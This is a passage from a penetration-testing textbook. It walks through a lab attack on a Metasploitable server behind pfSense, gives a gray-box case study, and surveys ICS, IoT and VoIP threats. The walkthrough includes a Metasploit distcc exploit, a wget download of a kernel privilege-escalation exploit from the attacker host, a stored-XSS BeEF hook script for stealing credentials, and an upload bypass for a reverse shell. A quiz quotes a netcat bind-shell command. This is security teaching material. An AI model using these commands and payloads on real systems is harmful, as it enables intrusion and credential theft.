4. First of all, Nmap the firewall IP. You will notice that port 80 is open and that the
fingerprint shows there is a firewall, which is pfSense:
[ 137 ]
Network Penetration Testing and Best Practices Chapter 4
The Nmap results represent that a web server exists. This is Apache httpd 2.2.14. It
allows the TRACE method. http-title is Metasploitable. Similarly, a lot of other potential
information is enumerated.
[ 138 ]
Network Penetration Testing and Best Practices Chapter 4
Nikto
Now, let's try another tool on the server to enumerate different Common Vulnerability
Exposures (CVEs):
You will find a lot of interesting information here, such as outdated Python version,
directory indexing, allowed HTTP methods, PHP version, and so on.
Dirb
Now, let's brute-force a directory. You are confident that you will come across certain
directories that may contain interesting information:
[ 139 ]
Network Penetration Testing and Best Practices Chapter 4
You can list almost all of the directories, including security, setup,
config, and so on.
You will also find some interesting files such as robots.txt, which is
used to disallow web crawlers from crawling certain directories.
Hence, a lot of confidential information is stored here most of the time.
You will also find an interesting directory called the setup directory.
If you access this directory, you will find that the web developer has
left the database reset/set option open. No authentication is required.
[ 140 ]
Network Penetration Testing and Best Practices Chapter 4
4. Now, click on the Create / Reset Database button to reset the database. You'll see
that the database has been reset:
5. Now, traverse some other directories. The most interesting find is the docs
directory. What you will find is complete details about the web server, its
version, installation guide, setup guide, and administrator manual. You will also
find the default credentials you can use to log into it on page 4:
[ 141 ]
Network Penetration Testing and Best Practices Chapter 4
6. The default credentials may work. Go to the login page and enter them. Well
done – you have successfully logged into the network/web application:
You will find a dashboard with certain tabs (see the preceding screenshot). At the
moment, you are unaware of what this is. Check all the options and read the
instructions. You will find that this is a vulnerable server that contains a lot of
vulnerabilities that can be exploited. However, you may still have no idea about
the internal network behind the firewall.
7. Now, perform an all port scan. You will find that there is another port open; that
is, 3632. This looks interesting.
[ 142 ]
Network Penetration Testing and Best Practices Chapter 4
8. Search the CVEs and exploit-db. You will realize that there is an exploit that is
available that gives you a reverse shell on your machine. This exploit is available
in Metasploit:
Next, we will take a look at one of the most popular testing tools in the industry –
Metasploit.
Metasploit
Metasploit is a project that was created by Rapid7. It contains almost all publicly available
exploits. Similarly, it contains brute-force scripts, scanning scripts, and a lot more. Let's take
a look:
[ 143 ]
Network Penetration Testing and Best Practices Chapter 4
2. Now, we'll execute this exploit and check the various options that are available:
Use exploit/unix/misc/distcc_exec
Show options
[ 144 ]
Network Penetration Testing and Best Practices Chapter 4
With that, you will get a successful shell from the machine. But after using
the whoami command, you will see that your privileges are not that of the root
user. This means we'll need to gather some more information.
You will find that there is a privileged escalation exploit available for the kernel
version of the current release:
[ 145 ]
Network Penetration Testing and Best Practices Chapter 4
6. Now, we will transfer the exploit to the machine and try to perform PrivEsc. By
doing this, we'll exploit the machine again and get a reverse shell. Then, we need
to switch to the directory where the exploit is located:
cd /usr/share/exploitdb/exploits/linux/local
python3 -m http.server 8080 {on local shell}
wget http://192.168.43.177:8080/8572.c {on reverse shell}
[ 146 ]
Network Penetration Testing and Best Practices Chapter 4
8. Now, you need the process identifier (PID) of the udevd netlink socket:
cat /proc/net/netlink
ps aux | grep udev
[ 147 ]
Network Penetration Testing and Best Practices Chapter 4
2405 is the PID (the root PID; that is, 2406). You will receive a shell from the
machine. If everything went well, this should be a root shell.
Hurray! You are now the root user. This means you can execute all the commands you
intend to use in this web server. You can even deface, send a shutdown signal, remove
directories, and delete anything we want. So, let's see how we can play around:
[ 148 ]
Network Penetration Testing and Best Practices Chapter 4
The IP address is 172.23.24.102. You attacker is inside the network. You'll see
that the netmask is 255.255.255.0 or /24.
2. Now, we need to guess the gateway IP, which must be the IP address of the
firewall:
Ping 172.23.24.1
[ 149 ]
Network Penetration Testing and Best Practices Chapter 4
The ping is successful. With that, we have successfully found out the internal
interface IP of the pfSense firewall.
By doing this, we were able to successfully ping 172.23.24.100, which is the IP address of
the network administrator.
So far, you, as the attacker, are successfully able to get the root privileges on the web server
and map the internal network and known IP scheme that is being used inside the castled
network.
You now know that to take over the firewall, which is very necessary to expose everything
on the public interface and wipe off the traces of your activities in the internal network, you
must take over any machine that is on a local network. One of those machines will belong
to the network administrator and he/she will surely be accessing the internal firewall
interface, which they'll be assuming is on the 172.23.24.1 address.
Now, focus on the vulnerabilities that you found on the web server.
Stored XSS: Search and you will find that there is a stored XSS vulnerability in one of the
pages of the web server. This is very useful for hooking and retrieving information from
legitimate users.
Next, we will learn how BeEF can be used to test and exploit an XSS attack.
1. Start by using a script that will check the response of the vulnerable application:
<script src="http://192.168.43.177:3000/hook.js"></script>
[ 150 ]
Network Penetration Testing and Best Practices Chapter 4
2. You will find that you are unable to write the complete address in the message
portions. Simply right-click and inspect the source. You will see an input limit of
50 characters. Increases it to 500. Now, you can successfully write the complete
script in the message box:
3. As soon as you press the Submit button, the script will be stored on the
server. Now, anyone accessing this web page will be hooked to your BeEF panel.
Wait for anyone to log into the web server and access that particular page.
4. Fortunately, the innocent administrator accesses the web page, which means the
bait has been taken:
[ 151 ]
Network Penetration Testing and Best Practices Chapter 4
You can view the hooked browsers under the Online Browsers option.
There is an IP address of 192.168.43.74 here. But wait – this is the IP of the
public interface of the firewall. This means someone has accessed the web
page but that their IP is being hidden by the firewall. This means they might
be the network administrator.
6. The administrator enters the credentials, and here we are. We have successfully
received the credentials of the firewall:
[ 152 ]
Network Penetration Testing and Best Practices Chapter 4
The machine is still hooked up to our BeEF portal. Here's the hook map:
Now, we will look at Burp Suite and how it can be utilized to test a web application for
vulnerabilities.
Burp Suite
The next tool we are going to look into is Burp Suite. Burp is a proxy that is used to
intercept traffic before it reaches the target. It's then used to manipulate and analyze HTTP
requests and launch different attacks based upon the analysis. Burp Suite comes as a
community version, as well as a paid version. The community version provides far fewer
capabilities than what a paid version can do.
Here, we will try to exploit the file upload vulnerability using Burp Suite. We will see that a
PHP exploit that we are unable to upload due to restrictions on the file extension will be
successfully uploaded by us manipulating the request in burp after capturing it:
1. Go to Damn Vulnerable Web App (DVWA) and click the Options file upload
vulnerability.
2. You will notice that you can upload images with .png and .gif extensions, as
well as any file with an image/.png content type. However, anything with the
.php and .py extension is not allowed.
3. Now, turn on Burp Suite on your Kali Linux machine.
4. Go to the browser and change the proxy settings to 127.0.0.1 and the port number
to 8080. Now, any request that comes through on port 8080 of the loopback
interface will be intercepted by the Burp Suite proxy.
5. Once intercepted using Burp Suite, you will see that the request with a PHP file
upload has a content type of application/x-php:
[ 153 ]
Network Penetration Testing and Best Practices Chapter 4
7. You can get a reverse shell by visiting the given URL and listening for a shell in
Metasploit.
This concludes our discussion pertaining to the top platforms that can be used for testing
applications. Remember that you can easily use such platforms and carry out a controlled
attack to see how effective the security measures that are in place in are. Next, we will take
a look at some of the industry's best practices for penetration testing engagements.
[ 154 ]
Network Penetration Testing and Best Practices Chapter 4
Case study
The organization has most of its services running on a single web server that was behind an
IPS with a few other network services installed separately. The separate services included a
mail server, the on-site employees' (system and network administrators) workstations, and
a few other machines. They commissioned John to carry out the pen testing exercise to
provide an analysis of how much their systems are at risk. The wanted to know whether, in
the case of an attack, the breach can be extended and the different ways the system can be
breached.
John was told that he had to carry out a gray-box testing exercise. He was given a map of
the complete network, as well as its documentation. He had no access to the internal source
codes and databases. John, after asking a few questions, started the pen testing task and
carried out the following phases:
Information gathering
Server scanning
Identifying and exploiting vulnerabilities
Reporting
Presentation
[ 155 ]
Network Penetration Testing and Best Practices Chapter 4
Information gathering
First of all, John went on some querying search engines to find out as much information as
he could regarding the organization. He tried to find out the contact details of employees,
any tech companies that the organization has as contacts for maintenance and support, any
authentication pages, admin pages, and the kind of information that's being exposed on the
website.
Then, he started querying the whois database. He searched all the platforms, including the
most suitable for an attack. He found the hosting registrar, which is who the IP ranges of
the organization are registered to, their contact details, and the DNS servers that are being
used by the organization, as well as any separate mail servers associated with them. At this
point, John has been able to gather a lot of information, but none of it is very important for
pointing out any loopholes in the organization's systems. He has successfully found some
employee contact details, which may come in handy for sophisticated phishing attacks.
Upon completing this phase, John was told that the website was being hosted on an
Amazon web server, as well as the DNS that was being used as the default AWS DNS. The
organization had an old website that was being hosted on an external hosting company that
wasn't being maintained. This web server revealed a lot of critical information and
appeared to have a few vulnerabilities.
Keep in mind that all the information that's been gathered so far is
publicly available on different search engines and that no scanning tools
have been used on the organization's servers. In other words, we have not
made any direct contact with the servers of the organization yet.
A comprehensive scan was performed using Nmap, which revealed services such as FTP,
SSH, and HTTP. The scan also revealed the type of servers that were being used. An old
Magento CMS was being used to manage the medicine purchase forum, and the CMS had a
severe RCE vulnerability. The server being used was IIS by Microsoft. Ping was disabled on
the servers. Similarly, John was unable to conduct a successful traceroute. Several services
were running on the web servers of the organization. One of the ports (264) indicated the
existence of a checkpoint firewall.
[ 156 ]
Network Penetration Testing and Best Practices Chapter 4
While conducting the scan, the Nmap script timed out repeatedly and the connection died.
This indicated that there was some sort of protection that was locking out the source IP on
more than a thousand requests within a specific period. The strategy was devised and port
scanning was performed using the zero traffic technique, which is used to keep the scan
traffic as low as possible to avoid triggering an intrusion detection system/intrusion
prevention system.
The Dirb scan revealed that the directory listing on almost all the servers was forbidden.
However, the web server that wasn't provided by AWS had directory listing enabled. The
directories revealed some tentative information, such as the employees' data, including
their social security numbers, their date of hire, their pay scales, job title, and their expertise
level. Upon interacting with the employees, John had found out that some of the employees
were still working in the same organization. This meant he was able to guess which person
wasn't a domain expert, as well as the domain under their responsibility, which may end
up being misconfigured.
A CMS that was being used was Magento < 1.9.0.1. It had an RCE vulnerability. John was
able to successfully exploit this CMS using a publicly available exploit on Exploit DB. Then,
he added routes to it and pivoted it successfully. At this point, he was able to ping the
inside LAN being protected by the firewall. Using tools such as netstat, John was able to
map the inside network. He then conducted a phishing attack on the firewall using BeEF.
Once he had access to it, he changed its configurations and exposed the hidden services. At
this point, John informed the organization that they had a critically compromised host.
After pivoting to gain elevated privileges, credentials were harvested for users with admin
privileges.
John then discovered the CGI-Bin directory. He was also able to find out the robot.txt
file, which exposed the admin pages. He was able to find out the VPN scripts that were
being given to the remote employees of the organization.
John then conducted database analysis. Some common business-level logics were
discovered. One of the database servers that contained information related to the
organization's products had a misconfiguration in a PHP file that integrated the database
and the web servers.
[ 157 ]
Network Penetration Testing and Best Practices Chapter 4
Reporting
All the findings were mentioned in a report. This report contained all the vulnerabilities,
related CVE details, the dates necessary, publicly available exploits (Magento), the versions,
and the possible causes of the existing vulnerability.
The executive summary explained the overall details of the complete test. The report
mentioned that although the network was properly hardened with a firewall that exposed
no critical information and policies, the system still had a lot of loopholes. The old website
was recommended to be either shut down or be maintained properly so attackers can't find
it out and go for dumpster diving techniques to launch attacks on the updated servers. The
information available on the older website may have also led to phishing attacks, which
would have caused a severe breach of the organization's online security.
The vulnerabilities and incorrect business logic that had been found were represented with
a graph that contained different colors representing their severity level. The Magento CMS
with an RCE vulnerability was placed on the top with a rich red color to indicate the
highest vulnerability level as it could have led to the domain being taken over if it had been
discovered by an attacker.
This is followed by the technical aspect of the report, which covers the following
information:
Information gathering from sources such as Whois, search engine queries, DNS
queries, and Tracert/ping queries
Scan results from sources such as UDP/TCP scans, Dirb scans, Nikto scans, and
banner grabbing
Exploitation results of Magento < 1.9.0.1, Exploit DB results, CVEs, and so on
Walkthrough of how practical exploitation was performed
Technical details of each vulnerability
Recommendations
Presentation
After the report was generated, John then made a presentation and presented the report in
a meeting that contained both technical as well as non-technical staff. The presentation was
made with the concepts of executive summary in mind so that it targeted everyone with
differing IT levels. The presentation explained all the loopholes and their severity levels, as
well as which technique was used to compromise them.
[ 158 ]
Network Penetration Testing and Best Practices Chapter 4
A hard copy containing all the suggestions was handed over to the IT staff. After the
presentation, a group discussion was held, where the misconfigurations were discussed, as
well as how to patch all the vulnerabilities. A few policies were made that should be
practiced in the future.
With the help of this case study, you probably have a clear picture of the various aspects of
pen testing, such as the process, the tools, and other activities that must be performed.
Before we conclude, there are a few other practices we'll go over that are useful when
conducting pen testing.
Source code vulnerabilities: These are the flaws that exist in a particular piece of
software code due to human error or the incompetence of the developer. A few
examples of such vulnerabilities are as follows:
Incorrect sanitization of the user input
Incorrect business logic
Incorrect database configuration
Failed session handling
Hardcoding sensitive information in the source code
Using insecure functions
Architecture flaws: These are the loopholes that can be found in a given
architecture that is being used as the base for our current network. Sometimes,
the power of any architecture can be misused and result in a flaw. A few
examples include PHP deserialization vulnerabilities, Shellshock/Bashdoor
(misuse of Bash).
Configuration flaws: These are the loopholes that are left out unintentionally
while configuring a network. A few examples include leaving ports open, leaving
services open with no authentication, inappropriate network hardening,
and DMZ and firewall misconfigurations.
[ 159 ]
Network Penetration Testing and Best Practices Chapter 4
Besides these, there are two basic solutions you should follow:
This concludes the penetration testing best practices that are available. Now, we will take a
look at the team compositions that take part in a typical pen testing engagement and the
role that they play.
One team is the attacking team, who sits outside the infrastructure. They are
known as the red team.
The second team is the defending team, who tries to expose the attacking team.
They are known as the blue team.
The third team is the purple team, who basically maximize the communication
between the team and summarize the findings and strategies of the team in a
single narrative before trying to improve the security of the system.
Red team
Pen testing is the art of testing any given network with legal permission and staying within
certain boundaries. Pen testing may be done while knowing the complete infrastructure of
the internal network and the people and processes involved in that network.
[ 160 ]
Network Penetration Testing and Best Practices Chapter 4
Red teams are the entities that are related to internal entities and are dedicated to testing
the effectiveness of any given organization. Red teaming is a bit different from pen testing.
Red teaming is the concept of making a team that composes security experts and trying to
challenge the security of any organization via social engineering, human flaws, boundary
breaches, and more. They keep themselves undetected and attack in a way in which a real
attacker or hacker would do.
Blue team
The responsibility of the blue team is to sit inside the organization and prevent, repulse,
and deny any attack that's launched at the organization by the red team and real attackers.
Blue teams are not the standard security teams in any given organization. They may be
available for a specific period in which the network is being pen tested and a red team is
attacking. The blue team will then try to repulse and track down the entities of the red
team.
Purple team
The responsibility of the purple team is to maximize the effectiveness of the findings of
both the red and blue teams. They take the vulnerabilities and flaws found by the red team
as input and the defense parameters and strategies deployed by the blue team and then
combine them into a single narrative. Then, the results are deduced to improve the
network's organization. The purple team is there to enhance communication and any
required information sharing between the red and blue teams.
Before we conclude this chapter, let's take a look at a few common engagement models and
methodologies of pen testing.
[ 161 ]
Network Penetration Testing and Best Practices Chapter 4
Black box
In black-box testing, the pen tester is given the role of a hacker. We are not provided with
any details of the internal network, any inside IP scheming details, nor any diagrams or
maps of the network. We have limited knowledge and are told that we have to pen test a
specific network whose IP address is known. The pen tester then makes their way in by
using different tools. First of all, the pen tester gathers information, finds any
vulnerabilities, and then prepares a penetration test report.
Gray box
Gray-box testing is the technique in which the pen tester has some access to the internal
network. We may be given a map of the system and any documentation of the services
running. The purpose of gray-box testing is to save the time of the pen tester and make a
more effective penetration test exercise than black-box testing.
White box
White-box testing is the process in which a penetration tester is given complete access to an
internal network, just like a superuser would. We are given access to the databases,
documentation, internal networks, and any other details that are hidden otherwise. The pen
tester then makes their way through the detailed source code, configuration files, and
database configurations and finds any potential vulnerabilities that could be exploited.
[ 162 ]
Network Penetration Testing and Best Practices Chapter 4
Summary
In this chapter, we created a step-by-step guide surrounding activities that can be carried
out when performing penetration testing. We went through an array of different tools and
platforms that will help and assist us in conducting such an exercise, as well as how to plan
activities efficiently to get the most out of our time and resources. We ended this chapter
with a few best practices. This chapter has familiarized you with the various phases of
penetration testing, along with the major platforms that you can use for your pen testing
exercises. We also talked about the roles of the red and blue teams, including how they add
more insights so that we can reap the best results.
At this point, you should be able to conduct a penetration testing exercise and document
your findings for the next course of action. You have the conceptual foundations under
your belt and the necessary attributes to make the test effective and produce a valued
outcome.
In the next chapter, we will take a look at advanced network attacks such as threats and
vulnerabilities surrounding critical infrastructure, prominent exploitation, and much more.
Questions
The following is a list of questions that will help you test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 163 ]
Network Penetration Testing and Best Practices Chapter 4
3. In a structured penetration test, which one of the following steps occurs first?
Determine the scope of the test.
Run a vulnerability scan.
Conduct social engineering.
Conduct network reconnaissance.
4. An analyst is unable to gain access to an internal network containing the
organization's database server. However, the analyst is able to access a web
application that relies upon that database. Which of the following attacks can
help the analyst gain access to the database?
Cross-site scripting
Network eavesdropping
Brute-force password guessing
SQL injection
5. Which of the following tools is specifically designed to serve as a web application
assessment tool?
1. Nessus
2. Nikto
3. Rapid7 Nexpose
4. Nmap
6. Which file is most likely to contain the hashed passwords for local accounts on
Linux?
/etc/shadow
/etc/password
/etc/accounts
/etc/passwd
7. During a penetration test, the tester executes the nc -l -p 23 -t -e
cmd.exe command on a Windows system. What is the purpose of this
command?
To create a telnet connection to a server
To respond to SSH connection requests
To create an SSH connection to a server
To respond to Telnet connection requests
[ 164 ]
Network Penetration Testing and Best Practices Chapter 4
Further reading
To learn more about how to perform penetration tests on your network, visit the following
links:
[ 165 ]
Network Penetration Testing and Best Practices Chapter 4
Sample PT
report: https://www.offensive-security.com/reports/sample-penetration-t
esting-report.pdf
Network PT case study: https://www.dionach.com/library/network-
penetration-test-case-study
PT for a Mobile Operator: https://www.scnsoft.com/case-studies/
penetration-testing-for-a-mobile-operator
Exploit DB : https://www.exploit-db.com/exploits/37811
[ 166 ]
5
Advanced Network Attacks
The notion that physical attacks can be transposed through the cyber realm was considered
Hollywood-esque and a joke until a few years ago. However, the current nature of attacks
that are carried out on industrial and nuclear facilities, such as the Stuxnet attack, has made
this fear a tangible reality and has put cybersecurity, in relation to critical infrastructure, on
the radar. With the increasing significance of Industrial Control Systems (ICS)
cybersecurity, it's necessary to understand how ICS infrastructure attacks operate and the
threats related to them.
In this chapter, we will focus on introducing the technical groundwork and practical
procedures for securing critical cyber and physical infrastructures, along with their
underlying architecture. Such infrastructure includes public services utilities such as power
grids, water and energy systems, transportation and air traffic control systems,
telecommunication networks, medical and healthcare infrastructure, financial, banking,
and government, and strategic and public infrastructures and assets.
Technical requirements
To get the most out of this chapter, you need to familiarize yourself with the following
topics:
Today, we are surrounded by ICSes that impact our daily lives. This system includes
services such as water treatment, water control systems, electricity and power grids, public
transport, oil and natural gas, medical and pharmaceutical setups, and manufacturing,
among many others. In the future, as we move toward smart cities, cars, and houses, ICS
and IoT are going to play a key role.
With the wide usage of ICS in modern technological enhancements, a significant amount of
attention is being paid to the industry by both security researchers and threat actors. This
has resulted in an increase in the number of vulnerabilities being disclosed each
year. According to a report published by Dragos, experts analyzed 438 ICS vulnerabilities
that were reported in 212 security advisories. They found that 26% of the advisories were
related to zero-day flaws.
[ 168 ]
Advanced Network Attacks Chapter 5
The following graph by the ICS Cyber Emergency Response Team is another example that
shows how the number of ICS vulnerabilities is increasing year after year:
Over the last few years, ICS has been subjected to various advanced attacks. For
example, Stuxnet was used in one of the most widely known ICS attacks, which targeted
Iran's nuclear program. It aimed to physically destroy the centrifuges.
Since 2015, there have been many reports pertaining to attacks focused on Programmable
Logic Controllers (PLCs), Supervisory Control and Data Acquisition (SCADA), and
ICS in order to affect manufacturing industries, among others. With each passing day, such
attacks and the sophistication of these attacks will only see a rise.
So, how are these attacks actually carried out and can we defend ourselves against them?
Of course! The upcoming subsections will take you through some of the attack frameworks
and vulnerable points that will help us create a solid defense.
[ 169 ]
Advanced Network Attacks Chapter 5
Although the cyber kill chain is not a direct fit for the kind of ICS attacks that we see today,
it can serve as a baseline for creating a more aligned framework for them. The following
diagram shows the steps that can be carried out at different phases to mitigate an advanced
cyber intrusion attack:
[ 170 ]
Advanced Network Attacks Chapter 5
In order to craft a precise and sophisticated working exploit, which may demonstrate
advanced techniques such as persistent, silent data exfiltration, or the disruption of
services, we need to have deep knowledge of how the ICS system works and understand its
technical architecture and inner workings. Acquiring this knowledge allows an attacker to
get the lay of the land and create attack tactics that will surpass the security mechanisms in
the environment so that they can get deeper access. A two-stage attack is initiated to
achieve this:
These industries are crucial in day-to-day public life and have dedicated Information
Sharing and Analysis Centers (ISACs), which focus on threat impacts specifically for their
respective sectors and industry and share intelligence with the members of the ISAC. The
following table summarizes the various industries and their corresponding ISACs.
Although we will not be discussing each ISAC in detail, you can visit their websites to find
out more:
[ 171 ]
Advanced Network Attacks Chapter 5
Concern for cybersecurity is increasing day by day as more and more digital transformation
in such sectors is opening them up to cyberattacks. A reason that warrants special focus on
these sectors is the direct impact on the social life of a nation's population if such services
are disrupted. The other factor is that, today, adversarial nations often target the critical
infrastructure of another nation to deter them politically instead of getting into direct
conflict as this is a more subtle option. Hence, establishing a comprehensive security
framework and patching all related systems systematically is gaining importance when it
comes to increasing the cyber resilience of such systems.
Some of the major cybersecurity issues and problems that are faced by critical
infrastructures are as follows:
Traditionally, owners of digitized infrastructures typically focus their energy and efforts on
improving the efficiency of the system rather than on the security aspect of it.
[ 172 ]
Advanced Network Attacks Chapter 5
In recent times, security researchers have demonstrated that malware can be used to control
the systems of a water treatment plant. Subsequently, such malicious code can be used by
threat actors to disrupt the services being used by the plants, thus impacting the
population. This is just one of many such malware that has been developed by researchers
to show the kind of impact and implications that unfixed vulnerabilities and a lack of a
coherent security strategy and enforcement in the ICS sector can result in. Therefore, while
we strive toward digital transformation and integrating technology into various aspects of
our industries, it is equally as important to focus on the secure nature of these innovations
and protect them on an ongoing basis with security road-mapping and cyclic evaluation.
The best way to move toward a more secure environment is to accept that threats are going
to evolve and that attacks will come in all shapes and forms. We need to look from the
attacker's perspective, similar to black-box testing, in order to understand which aspects
may be attacked and how threat actors might aim at targeting the environment. We need to
focus on creating an integrated security platform that has deep and wide visibility of all our
assets and can be alerted in case any anomaly is detected so that we can respond in a timely
fashion.
Every information technology infrastructure has a dedicated network of its own that is
used for its business operations. Every IT component connected to the internet is vulnerable
to attacks; the only system that is 100% secure is the one that is shut down. Throughout the
years, we have seen examples where threat actors have broken into a retail organization
via the store's air conditioning system, which was an internet-connected control
system. This led them to the corporate network where they processed their store's credit
card payments, which further resulted in a huge data breach. This is a great example of
why network segmentation and containing data are important.
However, the question remains, why was the targeted Heating, Ventilation,
and Air Conditioning (HVAC) system not segregated from the payment system network?
The potential that could be provided from it being derived from a connecting network is
understandable, so averting inter-connected systems is not a practical solution. However,
attention should be paid to how such system interactions are (securely) designed by
keeping in mind how they impact the risk posture and open the larger network or
environment to cyber threats coming from the internet. We should also deploy mitigating
controls to account for any threats that are there as part of such integrations and test them
to validate the efficiency and effectiveness of those controls.
[ 173 ]
Advanced Network Attacks Chapter 5
This is why embedding security into the network planning and designing phase is very
important when it comes to building a strong, fundamental base, upon which further
improvements can be made with ease. There should also be a focus on having human-
operated or manual modes overriding significant controls that might be altered in such
critical infrastructures in case of a cyber attack.
Now that we've looked at the various frameworks that can be adopted to protect ICS
industries, let's shift our focus and look at some vulnerabilities.
ICS insider
Targeted ransomware
Zero-day
APT attacks
Compromised vendor websites
Vendor backdoor
Malware
Hardware supply chain
Vulnerabilities exploitation
Nation-state crypto compromise
Each of these attacks can be benchmarked based on the level of sophistication involved and
the impact that they have on the target environment. Sophistication shows key insight
involving the attack, such as the tools and techniques being used that are common and
prevalent or are unique to this attack.
[ 174 ]
Advanced Network Attacks Chapter 5
This, in turn, shows the technical capability of the threat actor and the resources that are
used to develop the threat. This may range from the infrastructure that's used to launch and
cover the attack, to the infrastructure that's used to test and fine-tune how the attack works
and test its effectiveness.
[ 175 ]
Advanced Network Attacks Chapter 5
2016 saw a busy year with attacks on ICS and SCADA systems across the globe.
Ukraine suffered a power blackout due to a series of cyberattacks impacting
major power plants across the nation. The attack propagation occurred via
malware being spread, which was initially introduced via phishing emails.
In 2017, another cyberattack campaign focused on Ukraine occurred that
disrupted the transportation industry. Airports and subway infrastructure
systems were targeted, which hampered public transportation and the services
that were rendered by them.
2017 also saw the emergence of WannaCry, which severely impacted the
functioning of various industries and sectors, including 16 hospitals in the
United Kingdom, disrupting medical services.
In 2017, Saudi Arabia also saw the advent of cyberattacks focused on oil, gas, and
utility verticals in the form of a new malware known as Triton (by exploiting a
vulnerability in Windows OS). This was used to gain control of the safety
instrumented system. The malware was created and configured for ICS.
With that, you should now be aware of the risk that threat actors pose toward ICS
industries, as well as a few frameworks that can be taken to mitigate them. Next, we will
take a look at the process of penetration testing an IoT network and how security engineers
and threat actors reverse engineer firmware.
In this section, we will take a look at the security issues that affect IoT, such as hardcoded
passwords, lack of security by design, and so on, as well as the proposed solutions that can
help make it more secure. We will also look at UARTs and understand how they function,
along with different attributes of firmware and reasons for reverse engineering them.
[ 176 ]
Advanced Network Attacks Chapter 5
Network/intercommunication
Application
Firmware/operating system
Hardware
IoT is considered an extension of the conventional internet, where the idea is to be able to
establish connectivity between different applications and objects in the real world for a
seamless experience for the user. IoT consists of three major layers, as follows:
There are also five layered architectures, which includes additional layers such as business,
transport, and processing, as shown in the following diagram:
[ 177 ]
Advanced Network Attacks Chapter 5
No matter which layers approach we look at, there are individual vulnerabilities and
protocol flaws that can be exploited by threat actors. Hence, we need to ensure that
adequate protection is placed at each layer and that defense in depth is enforced. Some of
the major aspects that should be taken into consideration are as follows:
A good resource where you can find out more about the security aspects
of IoT is https://www.iotsecurityfoundation.org/.
Once you've shored up your basic security, you can test your infrastructure and also your
IoT network for vulnerabilities. When testing an IoT network for threats, security
professionals should familiarize themselves with architectures such as ARM, SuperH,
MIPS, and PowerPC, as well as communication protocols such as ZigBee, Near Field
Communication, and Software Defined Radio so that they understand the system.
An IoT pen tester must meet the following skill requirements and methodologies in order
to find and fix security issues in an IoT network:
[ 178 ]
Advanced Network Attacks Chapter 5
Some useful general techniques you can use to secure an IoT network are as follows:
The following diagram shows the various areas that must be kept in mind when pen
testing:
IoT refers to a big network of devices that communicate with each other. Though this
connection probably brings game-changing benefits, it doesn't come without problems
regarding security, such as high-risk vulnerabilities.
In the three-layered structure that we discussed, each layer has inherent security
challenges, most of which pertain to traditional networking issues. For example, the
perception layer is susceptible to attacks such as eavesdropping, cloning, and spoofing. The
network layer can face attacks such as DDoS, data tampering, and sniffing. Similarly, the
application layer can be attacked using SQL injection, cross-site scripting, and so on.
In order to tackle such attacks, an IoT security assessment should focus on the following
aspects:
Application
Infrastructure
Device firmware
[ 179 ]
Advanced Network Attacks Chapter 5
Wireless protocol
Cloud services
Embedded devices
Besides the steps we've just discussed, penetration testing or pen testing is another excellent
way in which IoT can be secured. We'll learn more about this next.
Reconnaissance
Evaluation
Exploitation
Reporting
Reconnaissance
This is the primary stage where each of the layers is looked at to collect information
pertaining to their attributes. The following information can be gathered at each layer:
[ 180 ]
Advanced Network Attacks Chapter 5
Evaluation
In the evaluation stage, information that was collected in the previous stage is evaluated to
estimate the possible attack tactics and techniques that might be used by a threat actor.
There are many industry-recognized frameworks that can be used to benchmark these
evaluation metrics. However, it is recommended to tweak these metrics based on their
suitability for the business for better correlation and contextualization.
Exploitation
This is the stage where the actual attack will take place based on the evaluation that was
performed in the previous stage. Attacks such as the ones discussed previously will be
tested across the network to validate the possibility of the attacks and the impact they will
have on the target environment. We need to utilize various tools such as IoTSeeker,
the Hardware Bridge API, Aircrack-ng, Metasploit, password crackers, w3af, and SEToolkit
to conduct penetration testing exercises.
Reporting
Once all the preceding stages have been completed, we create a consolidated report to
translate our findings and observations, as well as the recommended security mitigations.
The report structure should contain an executive summary that talks about security issues
and recommendations at a very high level from a domain perspective for executive or
senior leadership. The latter part should have a technical aspect with the proof of the
exploitation attached to it to show how it was conducted. This allows the technical team to
review it.
Now that we've covered all the foundational IoT technologies, let's work on setting up an
IoT pen testing lab.
[ 181 ]
Advanced Network Attacks Chapter 5
Binwalk
Firmadyne
Firmwalker
firmware-mod-toolkit
Firmware analysis toolkit
GDB
Radare2
Binary Analysis Tool (BAT)
QEMU
IDA Pro (optional)
Unfortunately, to install plugins with Burp Suite, a pro license is required. All the tools
listed here are cross-platform as they are either Java-based or within your browser:
Burp Suite
OWASP ZAP
REST Easy Firefox plugin
Postman Chrome extension
[ 182 ]
Advanced Network Attacks Chapter 5
Now, let's look at the platforms and tools for advanced testing.
Some other notable mentions include SCYTHE, XM Cyber, Randori, and Picus. Check them
all out and give each one a try. You will only be able to find the right fit for your
organization and use case by testing them in your environment and gathering results that
you can compare.
UART communication
UART is a hardware component that's used for serial communication. It is a half-duplex,
asynchronous, serial protocol that enables communication between two nodes.
[ 183 ]
Advanced Network Attacks Chapter 5
Next, we will take a look at the attributes around firmware reverse engineering and
exploitation.
Today, almost all devices that we find in our surroundings are powered by firmware. This
ranges from a wide variety of products and appliances, including cars, televisions,
smartphones, medical appliances, and fridges. The technical architecture of these
embedded devices is quite different from what we traditionally see in our home personal
computers. They use a variety of interfaces for inter-communication such as Bluetooth,
UART, Wi-Fi, infrared, Zigbee, and so on. Hence, the risk of them being attacked is very
high.
To make them secure, reverse engineering can be carried out on IoT firmware. This
includes the following steps:
1. Extracting the firmware: IoT devices need to be updated from time to time based
on the new updates that are pushed by the provider. A large number of these
updates are sent over the air in an encrypted format, due to which a threat actor
or security professional can capture the firmware update and begin the process
of reverse engineering it.
2. Reverse engineering: Once the firmware is in possession, the next step is to use a
reverse engineering tool such as IDA Pro or Binary Ninja to break it down. You
will need a sound knowledge of assembly code to proceed further and examine
and analyze all the functions and components of the firmware such as the
kernel, filesystem, and boot loader and the inner workings of the firmware.
3. Hunting for security flaws: This is the most important phase as this is where we
check for the presence of loopholes and flaws in the firmware components, such
as hardcoded passwords and encryption keys, that can enable the actor to exploit
the firmware.
[ 184 ]
Advanced Network Attacks Chapter 5
With this, we've finished looking at how we can use pen testing and reverse engineering to
keep our network secure. In the next section, we will shift our focus to the VoIP network,
how threat actors exploit it, and the various mitigations that you, as a security professional,
can implement to secure your network.
In this section, we will discuss some of the common threat vectors that impact VoIP and the
defense mechanisms that can be implemented to mitigate those threats.
[ 185 ]
Advanced Network Attacks Chapter 5
The following diagram shows the framework of a corporate VoIP network that consists of
many devices, such as the SIP phone, router, and so on, that are linked to the internet:
[ 186 ]
Advanced Network Attacks Chapter 5
Flexibility
Costless
Portability
Integration options
Productivity improvement
VoIP has a few downsides to it as well. The cons of using VoIP are as follows:
